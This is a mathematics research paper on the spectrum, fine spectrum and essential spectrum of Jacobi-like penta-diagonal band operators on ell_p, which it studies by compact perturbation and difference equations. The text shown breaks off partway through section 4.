# Spectral properties of Jacobi-like band matrices on the sequence space \(\ell_{p}\) ###### Abstract. In this paper, the spectral properties of a class of Jacobi-like operators defined over the sequence space \(\ell_{p},\)\((1<p<\infty)\) which has a representation of an infinite band matrix where the entries of each non-zero band form a sequence with two limit points are investigated. The idea of compact perturbation is used to study the spectrum. Several spectral subdivisions are obtained. In addition, a few sufficient conditions on the absence of point spectrum over the essential spectrum are also discussed. Key words and phrases:Spectrum, Sequence spaces, Band matrices, Jacobi operators 2020 Mathematics Subject Classification: Primary 47A10, 47B37; Secondary 47B36, 46B45 ## 1. **Introduction** The spectral analysis of operators defined over sequence spaces has been treated by many researchers worldwide. The literature contains the spectrum and fine spectrum of several classes of Toeplitz operators [2, 6, 9], Cesaro operators [1, 7, 14], Rhaly operators [21, 22], operators generated by various difference equations [10, 11, 17, 18, 19], etc. For a detailed review, one may refer to the survey articles [4, 20] and the references therein. In particular, numerous mathematicians have focused their research on an important class of tridiagonal matrix, known as Jacobi matrix [3, 15, 16, 7]. The Jacobi matrix \(J\) is generated by the difference equation \[(Jy)_{n}=a_{n-1}y_{n-1}+b_{n}y_{n}+a_{n}y_{n+1},\ y_{n}\in\mathbb{C}^{\mathbb{ N}}\] with certain initial conditions where \(\{a_{n}\}\) and \(\{b_{n}\}\) are complex sequences. In this paper, we focus on the spectral properties of a class of Jacobi-like penta-diagonal band matrices defined over the sequence space \(\ell_{p}(1<p<\infty)\) where the entries in the non-zero bands form sequences with two limit points. Let \(\ell_{p}\) represents the Banach space of \(p\)-absolutely summable sequences of real or complex numbers with the norm \[\left\|x\right\|_{p}=\left(\sum_{n=1}^{\infty}|x_{n}|^{p}\right)^{\frac{1}{p}}.\] Also let \(\mathcal{D}_{p}\) denotes the set of all diagonal operators on \(\ell_{p}.\) For any operator \(T\in\mathcal{D}_{p},\)\(\operatorname{diag}(T)\) represents the sequence in the diagonal of \(T.\) In this work we investigate the spectral properties of a class of operators \(T\) defined over \(\ell_{p}\) represented by the following form: \[T=S_{r}^{2}D_{1}+D_{2}S_{\ell}^{2}+D_{3}\] where \(S_{r},S_{\ell}:\ell_{p}\rightarrow\ell_{p},\) denotes the right shift operator, left shift operator respectively and \(D_{1},D_{2},D_{3}\in\mathcal{D}_{p}\) with \(\operatorname{diag}(D_{1})=\{c_{n}\},\)\(\operatorname{diag}(D_{2})=\{b_{n}\}\) and \(\operatorname{diag}(D_{3})=\{a_{n}\}\). We further assume that the subsequences \(\{a_{2n-1}\},\)\(\{b_{2n-1}\},\) \(\{c_{2n-1}\}\) converges to the real numbers \(r_{1},\)\(s_{1},\)\(s_{1}\) respectively and \(\{a_{2n}\},\)\(\{b_{2n}\},\)\(\{c_{2n}\}\) converges to the real numbers \(r_{2},\)\(s_{2},\)\(s_{2}\) respectively where \(s_{1}\neq 0\) and \(s_{2}\neq 0.\) Our focus is to investigate the spectral properties of the operator \(T\) using compact perturbation technique. Let us consider another operator \(T_{0}\) over \(\ell_{p}\) defined by \[T_{0}=S_{r}^{2}D_{1}^{\prime}+D_{2}^{\prime}S_{\ell}^{2}+D_{3}^{\prime}\] where \(D_{1}^{\prime},D_{2}^{\prime},D_{3}^{\prime}\in\mathcal{D}_{p}\) with \[\text{diag}(D_{1}^{\prime})=\text{diag}(D_{2}^{\prime})=\{s_{1},s_{2},s_{1},s _{2},\cdots\},\ \text{diag}(D_{3}^{\prime})=\{r_{1},r_{2},r_{1},r_{2},\cdots\}.\] Using the properties of compact operators, it can be proved that \(T-T_{0}\) is a compact operator over \(\ell_{p}\). Both the operators \(T\) and \(T_{0}\) can be represented by the following penta-diagonal matrices \[T=\begin{pmatrix}a_{1}&0&b_{1}&0&0&\cdots\\ 0&a_{2}&0&b_{2}&0&\cdots\\ c_{1}&0&a_{3}&0&b_{3}&\cdots\\ 0&c_{2}&0&a_{4}&0&\cdots\\ 0&0&c_{3}&0&a_{5}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\\ \end{pmatrix},T_{0}=\begin{pmatrix}r_{1}&0&s_{1}&0&0&\cdots\\ 0&r_{2}&0&s_{2}&0&\cdots\\ s_{1}&0&r_{1}&0&s_{1}&\cdots\\ 0&s_{2}&0&r_{2}&0&\cdots\\ 0&0&s_{1}&0&r_{1}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\\ \end{pmatrix}.\] We obtain the spectrum, fine spectrum and the sets of various spectral subdivisions of the operator \(T_{0}.\) It is interesting to note that the spectrum of \(T_{0}\) is given by \[[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2}],\] which is also its essential spectrum with no eigenvalues. Later we investigate how the spectrum of \(T\) and \(T_{0}\) are related. Few results on the essential spectrum of \(T\) (which is identical to the essential spectrum of \(T_{0}\)) being devoid of its eigenvalues are also derived. This helps us to characterize the point spectrum of \(T.\) Theory of difference equations plays an important role in our study. We use various results on the asymptotic behaviour of solutions of difference equations to demonstrate the findings of our paper. For more details on difference equations one can refer [12]. The remainder of paper is organized as follows: section 2 is devoted to introduce some terminologies and results which are relevant to our work. Section 3 contains the results on the spectrum and fine spectrum of \(T_{0}\) over \(\ell_{p}.\) The spectral properties of \(T\) are discussed in section 4. ## 2. **Preliminaries** Let \(X\) and \(Y\) are Banach spaces and for any operator \(T:X\to Y\), \(N(T)\) and \(R(T)\) denote the null space and range space of \(T\) respectively. The operator \(T^{*}:Y^{*}\to X^{*}\) is called the adjoint operator and defined by \[(T^{*}f)(x)=f(Tx)\quad\text{for all $f\in Y^{*}$and $x\in X$}\] where \(X^{*}\), \(Y^{*}\) are the dual spaces of \(X\) and \(Y\) respectively. \(B(X)\) denotes the set of all bounded linear operators from \(X\) to itself. For any \(T\in B(X)\), the resolvent set \(\rho(T,X)\) of \(T\) is the set of all \(\lambda\) in the complex plane such that \((T-\lambda I)\) has a bounded inverse in \(X\) where \(I\) is the identity operator defined over \(X\). The complement of resolvent set in the complex plane \(\mathbb{C}\) is called the spectrum of \(T\) and it is denoted by \(\sigma(T,X)\). The spectrum \(\sigma(T,X)\) can be partitioned into three disjoint sets which are 1. the point spectrum, denoted by \(\sigma_{p}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) does not exist. An element \(\lambda\in\sigma_{p}(T,X)\) is called an eigenvalue of \(T,\) 2. the continuous spectrum, denoted by \(\sigma_{c}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) is exists, unbounded and the domain of \((T-\lambda I)^{-1}\) is dense in \(X\) but \(R(T-\lambda I)\neq X,\) 3. the residual spectrum, denoted by \(\sigma_{r}(T,X),\) is the set of all such \(\lambda\in\mathbb{C}\) for which \((T-\lambda I)^{-1}\) exists (and may be bounded or not) but the domain of \((T-\lambda I)^{-1}\) is not dense in \(X.\) These three disjoint sets are together known as fine spectrum and their union becomes the whole spectrum. There are some other important subdivisions of the spectrum such as approximate point spectrum \(\sigma_{app}(T,X),\) defect spectrum \(\sigma_{\delta}(T,X)\) and compression spectrum \(\sigma_{co}(T,X),\) defined by \[\sigma_{app}(T,X) = \{\lambda\in\mathbb{C}:\ (T-\lambda I)\text{ is not bounded below}\},\] \[\sigma_{\delta}(T,X) = \{\lambda\in\mathbb{C}:(T-\lambda I)\text{ is not surjective}\}\,,\] \[\sigma_{co}(T,X) = \left\{\lambda\in\mathbb{C}:\overline{R(T-\lambda I)}\neq X \right\}.\] The sets which are defined above also forms subdivisions of spectrum of \(T\) which are not necessarily disjoint as follows \[\sigma(T,X) = \sigma_{app}(T,X)\cup\sigma_{co}(T,X),\] \[\sigma(T,X) = \sigma_{app}(T,X)\cup\sigma_{\delta}(T,X).\] An operator \(T\in B(X)\) is said to be Fredholm operator if \(R(T)\) is closed and \(\dim(N(T)),\)\(\dim(X/R(T))\) are finite. In this case the number \[\dim(N(T))-\dim(X/R(T))\] is called the index of the Fredholm operator \(T\). The essential spectrum of \(T\) is defined by the set \[\sigma_{ess}(T,\ell_{p})=\{\lambda\in\mathbb{C}:(T-\lambda I)\text{ is not a Fredholm operator}\}\,.\] If \(T\) is a Fredholm operator and \(K\in B(X)\) is a compact operator then \(T+K\) is also a Fredholm operator with same indices. Since compact perturbation does not effect the Fredholmness and index of a Fredholm operator, we have \[\sigma_{ess}(T,X)=\sigma_{ess}(T+K,X).\] For any isolated eigenvalue \(\lambda\) of \(T,\) the operator \(P_{T}\) which is defined by \[P_{T}(\lambda)=\frac{1}{2\pi i}\int_{\gamma}(\mu I-T)^{-1}d\mu,\] is called the Riesz projection of \(T\) with respect to \(\lambda\) where \(\gamma\) is positively orientated circle centred at \(\lambda\) with sufficiently small radius such that it excludes other spectral values of \(T.\) An eigenvalue \(\lambda\) of \(T\) is said to be a discrete eigenvalue if it is isolated and the rank of the associated Riesz projection is finite. The rank of the Riesz projection is called the algebraic multiplicity of \(\lambda\). The set of all such eigenvalues with finite multiplicities is called the discrete spectrum of \(T\) and it is denoted by \(\sigma_{d}(T,X).\) This type of eigenvalues sometimes referred as eigenvalues with finite type. In the following proposition, we mention some inclusion relation of spectrum of a bounded linear operator and its adjoint operator. **Proposition 2.1**.: [5, p.195] If \(X\) is a Banach space and \(T\in B(X)\), \(T^{*}\in B(X^{*})\) then the spectrum and subspectrum of \(T\) and \(T^{*}\) are related by the following relations: 1. \(\sigma(T^{*},X^{*})=\sigma(T,X)\). 2. \(\sigma_{c}(T^{*},X^{*})\subseteq\sigma_{app}(T,X)\). 3. \(\sigma_{app}(T^{*},X^{*})=\sigma_{\delta}(T,X)\). 4. \(\sigma_{\delta}(T^{*},X^{*})=\sigma_{app}(T,X)\). 5. \(\sigma_{p}(T^{*},X^{*})=\sigma_{co}(T,X)\). 6. \(\sigma_{co}(T^{*},X^{*})\supseteq\sigma_{p}(T,X)\). 7. \(\sigma(T,X)=\sigma_{app}(T,X)\cup\sigma_{p}(T^{*},X^{*})\)=\(\sigma_{p}(T,X)\cup\sigma_{app}(T^{*},X^{*})\). Here we record few lemmas related to the boundness of an infinite matrix defined over sequence spaces, which are useful to our research. **Lemma 2.2**.: [8, p. 253] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{1})\) from \(\ell_{1}\) to itself if and only if the supremum of \(\ell_{1}\) norms of the columns of \(A\) is bounded. **Lemma 2.3**.: [8, p. 245] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{\infty})\) from \(\ell_{\infty}\) to itself if and only if the supremum of \(\ell_{1}\) norms of the rows of \(A\) is bounded. **Lemma 2.4**.: [8, p. 254] The matrix \(A=(a_{nk})\) gives rise to a bounded linear operator \(T\in B(\ell_{p})(1<p<\infty)\) if \(T\in B(\ell_{1})\cap B(\ell_{\infty})\). ## 3. **Spectra of \(T_{0}\)** It is already mentioned that we study the spectral properties of \(T\) by using the spectral properties of \(T_{0}\) and compact perturbation technique. In this section we derive the spectrum and fine spectrum of \(T_{0}\). The notation \(\|T\|_{p}\) denotes the operator norm of an operator \(T\in B(\ell_{p})\) where \(1\leq p\leq\infty\). **Theorem 3.1**.: The operator \(T_{0}:\ell_{p}\to\ell_{p}\) is a bounded linear operator which satisfies the following inequality \[\left(\frac{|r_{1}|^{p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{ 1}{p}}\leq\left\|T_{0}\right\|_{p}\leq\left(3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^ {p}+|r_{2}|^{p}+2|s_{2}|^{p}\right)\right)^{\frac{1}{p}}.\] Proof.: As linearity of \(T_{0}\) is trivial, we omit it. Let \(e=(1,1,0,0,...)\in\ell_{p}\). Then \(T_{0}(e)=(r_{1},r_{2},s_{1},s_{2},0,...)\) and one can observe that \[\frac{\left\|T_{0}(e)\right\|_{p}}{\left\|e\right\|_{p}}=\left(\frac{|r_{1}|^ {p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{1}{p}}.\] This proves \[\left(\frac{|r_{1}|^{p}+|r_{2}|^{p}+|s_{1}|^{p}+|s_{2}|^{p}}{2}\right)^{\frac{ 1}{p}}\leq\left\|T_{0}\right\|_{p}.\] Also, let \(x=\{x_{n}\}\in\ell_{p}\) and \(x_{n}=0\) if \(n\leq 0\). Then, \[\|T_{0}(x)\|_{p}^{p}= \sum_{n=1}^{\infty}|s_{1}x_{2n-3}+r_{1}x_{2n-1}+s_{1}x_{2n+1}|^{p}+ \sum_{n=1}^{\infty}|s_{2}x_{2n-2}+r_{2}x_{2n}+s_{2}x_{2n+2}|^{p}\] \[\leq \sum_{n=1}^{\infty}(|s_{1}x_{2n-3}|+|r_{1}x_{2n-1}|+|s_{1}x_{2n+1} |)^{p}+\sum_{n=1}^{\infty}(|s_{2}x_{2n-2}|+|r_{2}x_{2n}|+|s_{2}x_{2n+2}|)^{p}\] By Jensen's inequality we get, \[\|T_{0}(x)\|_{p}^{p}\leq 3^{p-1}\sum_{n=1}^{\infty}\left(|s_{1}x_{2n-3}|^{p}+|r_{1}x_{2n-1} |^{p}+|s_{1}x_{2n+1}|^{p}\right)\] \[+ 3^{p-1}\sum_{n=1}^{\infty}\left(|s_{2}x_{2n-2}|^{p}+|r_{2}x_{2n} |^{p}+|s_{2}x_{2n+2}|^{p}\right)\] \[\leq 3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^{p}+|r_{2}|^{p}+2|s_{2}|^{p} \right)\|x\|_{p}^{p}.\] This implies, \[\|T_{0}\|\leq\left(3^{p-1}\left(|r_{1}|^{p}+2|s_{1}|^{p}+|r_{2}|^{p}+2|s_{2}|^{ p}\right)\right)^{\frac{1}{p}}.\] This completes the proof. The following theorem proves the non-existence of eigenvalues of the operator \(T_{0}\) in \(\ell_{p}\). **Theorem 3.2**.: The point spectrum of \(T_{0}\) is given by \(\sigma_{p}(T_{0},\ell_{p})=\emptyset\). Proof.: Consider \((T_{0}-\lambda I)x=0\) for \(\lambda\in\mathbb{C}\) and \(x=\{x_{n}\}\in\mathbb{C}^{\mathbb{N}}\). This gives the following system of equations \[\left.\begin{array}{ll}(r_{1}-\lambda)x_{1}+s_{1}x_{3}&=0\\ (r_{2}-\lambda)x_{2}+s_{2}x_{4}&=0\\ s_{1}x_{1}+(r_{1}-\lambda)x_{3}+s_{1}x_{5}&=0\\ s_{2}x_{2}+(r_{2}-\lambda)x_{4}+s_{2}x_{6}&=0\\ &\vdots\\ s_{1}x_{2n-1}+(r_{1}-\lambda)x_{2n+1}+s_{1}x_{2n+3}&=0\\ s_{2}x_{2n}+(r_{2}-\lambda)x_{2n+2}+s_{2}x_{2n+4}&=0\\ &\vdots\end{array}\right\}\] We assume that \(x_{1}\neq 0\) and \(x_{2}\neq 0\) otherwise \(x_{n}=0\) for all \(n\in\mathbb{N}.\) Let us consider two sequences \(\{y_{n}\}\) and \(\{z_{n}\}\) where \(y_{n}=x_{2n-1}\) and \(z_{n}=x_{2n}\), \(n\in\mathbb{N}\) respectively. Then the system of equations of \((T_{0}-\lambda I)x=0\) reduces to \[y_{n}+p_{1}y_{n+1}+y_{n+2}=0, \tag{3.1}\] \[z_{n}+p_{2}z_{n+1}+z_{n+2}=0, \tag{3.2}\] where \(p_{1}=\frac{r_{1}-\lambda}{s_{1}},\)\(p_{2}=\frac{r_{2}-\lambda}{s_{2}},\)\(n\in\mathbb{N}\cup\{0\}\) and \(y_{0}=z_{0}=0\). The general solution of the difference equation (3.1) is given by \[y_{n}=\left\{\begin{array}{rl}&(c_{1}+nc_{2})(-1)^{n},\ \ \mbox{if}\ p_{1}=2\\ &c_{1}+nc_{2},\ \ \mbox{if}\ p_{1}=-2\\ &c_{1}\alpha_{1}^{n}+c_{2}\alpha_{2}^{n},\ \ \mbox{if}\ p_{1}\notin\{-2,2\} \end{array}\right. \tag{3.3}\] where \(c_{1},\)\(c_{2}\) are arbitrary constants and \(\alpha_{1},\)\(\alpha_{2}\) are the roots of the polynomial \[y^{2}+p_{1}y+1=0 \tag{3.4}\] which is called the characteristic polynomial of (3.1). The following two equalities \[\alpha_{1}\alpha_{2}=1\ \mbox{and}\ \alpha_{1}+\alpha_{2}=-p_{1}\] are useful. There are three cases to be considered. Case 1: If \(p_{1}=2\) (i.e., \(\lambda=r_{1}-2s_{1}\)). In this case the general solution of (3.1) is \[y_{n}=(c_{1}+c_{2}n)(-1)^{n},\ n\in\mathbb{N}\cup\{0\}\] with the initial condition \(y_{0}=0\) which gives \(c_{1}=0.\) This reduces the solution as \(y_{n}=nc_{2}(-1)^{n}.\) This also implies \(c_{2}=-y_{1}\) and the solution in this case is \[y_{n}=ny_{1}(-1)^{n+1},\ n\in\mathbb{N}.\] Case 2: If \(p_{1}=-2\) (i.e., \(\lambda=r_{1}+2s_{1}\)). Similar as Case 1, the solution reduces to \[y_{n}=ny_{1},\ n\in\mathbb{N}.\] Case 3: If \(p_{1}\notin\{-2,2\}.\) The general solution of (3.1) is given by \[y_{n}=c_{1}\alpha_{1}^{n}+c_{2}\alpha_{2}^{n}.\] With the help of initial condition \(y_{0}=0\) and by using the equalities \(\alpha_{1}\alpha_{2}=1,\)\(\alpha_{1}+\alpha_{2}=-p_{1},\) one can obtain that \(c_{2}=-c_{1}\) and the solution reduces to \[y_{n}=\frac{\alpha_{1}^{n}-\alpha_{2}^{n}}{\alpha_{1}-\alpha_{2}}y_{1},\ n\in \mathbb{N}.\] If \(y_{1}\neq 0\) then \(\{y_{n}\}\notin\ell_{p}\) in Case 1 and Case 2. In Case 3 \(\{y_{n}\}\in\ell_{p}\) if and only if \(|\alpha_{1}|<1\) and \(|\alpha_{2}|<1\) which can not be the case since \(\alpha_{1}\alpha_{2}=1.\) Hence in all the three cases \(\{y_{n}\}\in\ell_{p}\) if and only if \(y_{1}=0\) and this leads to the trivial solution of the difference equation (3.1). Hence there is no non-trivial solution of (3.1). Similarly for the difference equation (3.2), the general solution \(\{z_{n}\}\) is of the form \[z_{n}=\left\{\begin{array}{rl}&(d_{1}+nd_{2})(-1)^{n},\ \ \mbox{if}\ p_{2}=2\\ &d_{1}+nd_{2},\ \ \mbox{if}\ p_{2}=-2\\ &d_{1}\beta_{1}^{n}+d_{2}\beta_{2}^{n},\ \ \mbox{if}\ p_{2}\notin\{-2,2\} \end{array}\right. \tag{3.5}\] where \(d_{1},\)\(d_{2}\) are arbitrary constants and \(\beta_{1},\)\(\beta_{2}\) are the roots of the polynomial \[z^{2}+p_{2}z+1=0 \tag{3.6}\] which is called the characteristic polynomial of difference equation (3.2). In a similar way, it can be proved that \(\{z_{n}\}\in\ell_{p}\) if and only if \(z_{1}=0\) and this leads to the trivial solution of (3.2). Hence, there does not exist any non-trivial solution of the system \((T_{0}-\lambda I)x=0\) such that \(x\in\ell_{p}.\) This proves the required result. _Remark 3.3_.: The solution \(x=\{x_{n}\}\) of the system \(Tx=\lambda x\), which are obtained in terms of the sequences \(\{y_{n}\}\) and \(\{z_{n}\}\) in the equations (3.3) and (3.5) respectively, actually depends on the unknown \(\lambda.\) Therefore, instead of writing \(x_{n}(\lambda)\), we write \(x_{n}\) for the sake of brevity throughout this paper except in Theorem 4.6 where the dependency of the solutions on \(\lambda\) is vital. It is well known that the adjoint operator of \(T_{0}\) is \(T_{0}^{*}\) which is defined over sequence space \(\ell_{p}^{*}\) where \(\ell_{p}^{*}\) denotes the dual space of \(\ell_{p}\) which is isomorphic to \(\ell_{q}\) where \(\frac{1}{p}+\frac{1}{q}=1.\) **Corollary 3.4**.: The point spectrum of adjoint operator \(T_{0}^{*}\) over the sequence space \(\ell_{p}^{*}\) is given by \(\sigma_{p}(T_{0}^{*},\ell_{p}^{*})=\emptyset.\) Proof.: It is well known that the adjoint operator \({T_{0}}^{*}:\ell_{p}^{*}\to\ell_{p}^{*}\), is represented by transpose of the matrix \(T_{0}\). Since \(T_{0}\) is represented by a symmetric matrix, using the same argument as Theorem 3.2, it is easy to prove that \(\sigma_{p}(T_{0}^{*},\ell_{p}^{*})=\emptyset.\) **Corollary 3.5**.: The residual spectrum of \(T_{0}\) over the sequence space \(\ell_{p}\) is given by \(\sigma_{r}(T_{0},\ell_{p})=\emptyset.\) Proof.: We know that the operator \(T\) has a dense range if and only if \(T^{*}\) is one to one [5, p.197]. Using this we have the following relation \[\sigma_{r}(T_{0},\ell_{p})=\sigma_{p}(T_{0}^{*},\ell_{p}^{*})\setminus\sigma_ {p}(T_{0},\ell_{p}).\] Hence, \(\sigma_{r}(T_{0},\ell_{p})=\emptyset.\) Following that, we obtain the spectrum of \(T_{0}\). **Theorem 3.6**.: The spectrum of \(T_{0}\) is given by \[\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2s_{2 }].\] **Corollary 3.7**.: The continuous spectrum of \(T_{0}\) is given by \[\sigma_{c}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+2 s_{2}].\] Proof.: It is evident that \(\sigma(T_{0},\ell_{p})\) is the disjoint union of \(\sigma_{p}(T_{0},\ell_{p})\), \(\sigma_{r}(T_{0},\ell_{p})\) and \(\sigma_{c}(T_{0},\ell_{p})\), we have \[\sigma(T_{0},\ell_{p})=\sigma_{c}(T_{0},\ell_{p}).\] Hence, \(\sigma_{c}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2}+ 2s_{2}].\) **Corollary 3.8**.: Essential spectrum of \(T_{0}\) is given by \[\sigma_{ess}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{2 }+2s_{2}].\] Proof.: It is well-known that \(\sigma_{c}(T_{0},\ell_{p})\subseteq\sigma_{ess}(T_{0},\ell_{p})\) and we have \[\sigma_{ess}(T_{0},\ell_{p})\subseteq\sigma(T_{0},\ell_{p})=\sigma_{c}(T_{0}, \ell_{p})\subseteq\sigma_{ess}(T_{0},\ell_{p}).\] The desired result is obvious. Using the relations which are mentioned in Proposition 2.1 we can easily obtain the following results. **Corollary 3.9**.: The compression spectrum, approximate point spectrum and defect spectrum of \(T_{0}\) are as follows 1. \(\sigma_{co}(T_{0},\ell_{p})=\emptyset.\) 2. \(\sigma_{app}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_{ 2}+2s_{2}].\) 3. \(\sigma_{\delta}(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}]\cup[r_{2}-2s_{2},r_ {2}+2s_{2}].\) ## 4. **Spectra of \(T=t_{0}+k\)** This section contains the spectral properties of \(T\) which can be expressed as \(T=T_{0}+K\) where \(K=T-T_{0}\) is represented by the following matrix \[K=\begin{pmatrix}a_{1}-r_{1}&0&b_{1}-s_{1}&0&0&\cdots\\ 0&a_{2}-r_{2}&0&b_{2}-s_{2}&0&\cdots\\ c_{1}-s_{1}&0&a_{3}-r_{1}&0&b_{3}-s_{1}&\cdots\\ 0&c_{2}-s_{2}&0&a_{4}-r_{2}&0&\cdots\\ 0&0&c_{3}-s_{1}&0&a_{5}-r_{1}&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\end{pmatrix}.\] The following result proves the compactness of \(K\) on \(\ell_{p}\). **Theorem 4.1**.: The operator \(K\) is a compact operator on \(\ell_{p}\). Proof.: The operator \(K\) on \(\ell_{p}\) can be represented by the following infinite matrix \[K=\begin{pmatrix}u_{1}&0&v_{1}&0&0&\cdots\\ 0&u_{2}&0&v_{2}&0&\cdots\\ w_{1}&0&u_{3}&0&v_{3}&\cdots\\ 0&w_{2}&0&u_{4}&0&\cdots\\ \vdots&\vdots&\vdots&\vdots&\vdots&\ddots\end{pmatrix},\] where, \(\{u_{n}\}\), \(\{v_{n}\}\) and \(\{w_{n}\}\) are null sequences, which are defined as follows, \[u_{n}=\begin{cases}a_{n}-r_{1},\ n\text{ is odd}\\ a_{n}-r_{2},\ n\text{ is even},\end{cases}\qquad v_{n}=\begin{cases}b_{n}-s_{1},\ \ n\text{ is odd}\\ b_{n}-s_{2},\ n\text{ is even}\end{cases}\] and \[w_{n}=\begin{cases}c_{n}-s_{1},\ \ n\text{ is odd}\\ c_{n}-s_{2},\ n\text{ is even}.\end{cases}\] Let \(x=\{x_{1},x_{2},x_{3}...\}\in\ell_{p}\). We construct a sequence of compact operators \(\{K_{n}\}\) such that for \(i\in\mathbb{N}\), \[(K_{n}(x))_{i}=\begin{cases}(Kx)_{i},\ i=1,2,...n\\ 0,\ \text{otherwise}.\end{cases}\] For \(n\geq 2\), \[\left\|(K-K_{n})x\right\|_{p}= \left(\sum_{k=n-1}^{\infty}\left|w_{k}x_{k}+u_{k+2}x_{k+2}+v_{k+2 }x_{k+4}\right|^{p}\right)^{\frac{1}{p}}\] \[\leq \left(\sup_{k\geq n-1}\left|w_{k}\right|\right)\left\|x\right\|_ {p}+\left(\sup_{k\geq n-1}\left|u_{k}\right|\right)\left\|x\right\|_{p}+\left( \sup_{k\geq n-1}\left|v_{k}\right|\right)\left\|x\right\|_{p}\] This implies, \[\left\|K-K_{n}\right\|_{p}\ \leq\sup_{k\geq n-1}\left|w_{k}\right|+\sup_{k\geq n-1} \left|u_{k}\right|+\sup_{k\geq n-1}\left|v_{k}\right|.\] Thus, \(\{K_{n}\}\) converges to \(K\) as \(n\to\infty\) in operator norm and hence \(K\) is a compact operator over \(\ell_{p}\). Next we derive an inclusion relation between \(\sigma(T_{0},\ell_{p})\) and \(\sigma(T,\ell_{p})\). **Theorem 4.2**.: The spectrum of \(T\) satisfies the following inclusion relation \[\sigma(T_{0},\ell_{p})\subseteq\sigma(T,\ell_{p})\] and \(\sigma(T,\ell_{p})\setminus\sigma(T_{0},\ell_{p})\) contains finite or countable number of eigenvalues of \(T\) of finite type with no accumulation point in \(\sigma(T,\ell_{p})\setminus\sigma(T_{0},\ell_{p})\). **Corollary 4.3**.: \(\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}] \cup[r_{2}-2s_{2},r_{2}+2s_{2}]\)_._ Proof.: As we are aware of that compact perturbation does not effect the Fredholmness and index of a Fredholm operator. Therefore, \(\sigma_{ess}(T_{0},\ell_{p})=\sigma_{ess}(T,\ell_{p})\). Hence, by using Corollary 3.8, we have \[\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})=[r_{1}-2s_{1},r_{1}+2s_{1}] \cup[r_{2}-2s_{2},r_{2}+2s_{2}].\] We now focus on the point spectrum of \(T\). First we analyze the eigenvalues of \(T\) lying in \(\sigma_{ess}(T,\ell_{p})=\sigma(T_{0},\ell_{p})\), in particular we derive sufficient conditions for the absence of point spectrum on \(\sigma_{ess}(T,\ell_{p})\). In Theorem 4.4, sufficient conditions are provided in terms of the rate of convergence of the sequences \(\{a_{2n-1}\},\ \{a_{2n}\},\ \{b_{2n-1}\},\ \{b_{2n}\},\ \{c_{2n-1}\}\) and \(\{c_{2n}\}\). Sufficient conditions of absence of point spectrum on \(\sigma_{ess}(T,\ell_{p})\) are also provided in Theorem 4.5 in terms of the entries of the matrix \(T\). **Theorem 4.4**.: If the convergence of the sequences \(\{a_{2n-1}\},\ \{a_{2n}\},\ \{b_{2n-1}\},\ \{b_{2n}\},\\ \{c_{2n-1}\}\) and \(\{c_{2n}\}\) are exponentially fast then \[\sigma_{ess}(T,\ell_{p})\cap\sigma_{p}(T,\ell_{p})=\emptyset.\] In the next theorem, we apply transfer matrix approach as discussed in [15, 16]. This enables us to examine the sufficient condition for the absence of point spectrum in essential spectrum of \(T\) in terms of the entries of matrix \(T\). **Theorem 4.5**.: If \(\lambda\in\sigma_{ess}(T,\ell_{p})\) satisfies either of the following conditions (i) \(\sum_{n=1}^{\infty}\prod_{j=1}^{n}\left[\frac{1}{2}\left(P_{j}(\lambda)-\sqrt {P_{j}(\lambda)^{2}-\left|\frac{2c_{2j+1}}{b_{2j+1}}\right|^{2}}\right)\right] ^{\frac{1}{2}}=+\infty\) or (ii) \(\sum_{n=1}^{\infty}\prod_{j=1}^{n}\left[\frac{1}{2}\left(Q_{j}(\lambda)-\sqrt {Q_{j}(\lambda)^{2}-\left|\frac{2c_{2j+2}}{b_{2j+2}}\right|^{2}}\right)\right] ^{\frac{1}{2}}=+\infty\) where, \[P_{j}(\lambda)=\left|\frac{c_{2j-1}}{b_{2j+1}}\right|^{2}+\left|\frac{a_{2j+1 -\lambda}}{b_{2j+1}}\right|^{2}+1,\ Q_{j}(\lambda)=\left|\frac{c_{2j}}{b_{2j +2}}\right|^{2}+\left|\frac{a_{2j+2-\lambda}}{b_{2j+2}}\right|^{2}+1,\] then \(\lambda\notin\sigma_{p}(T,\ell_{p})\). Now we focus our study on the point spectrum of \(T\). Under the sufficient conditions as mentioned in previous two results, we have \(\sigma_{p}(T,\ell_{p})\cap\sigma(T_{0},\ell_{p})=\emptyset\). In this case, all the eigenvalues of \(T\) are lying outside the set \(\sigma(T_{0},\ell_{p})\). To characterize the eigenvalues, let \(Tx=\lambda x\), \(x\in\mathbb{C}^{\mathbb{N}}\) and \(\lambda\in\sigma(T_{0},\ell_{p})^{c}\) where \(\sigma(T_{0},\ell_{p})^{c}\) denotes the complement of \(\sigma(T_{0},\ell_{p})\). From equations (3.1) and (3.1) in Theorem 4.4, we have the following system \[c_{2n-1}y_{n}+(a_{2n+1}-\lambda)y_{n+1}+b_{2n+1}y_{n+2}=0, \tag{4.1}\] \[c_{2n}z_{n}+(a_{2n+2}-\lambda)z_{n+1}+b_{2n+2}z_{n+2}=0, 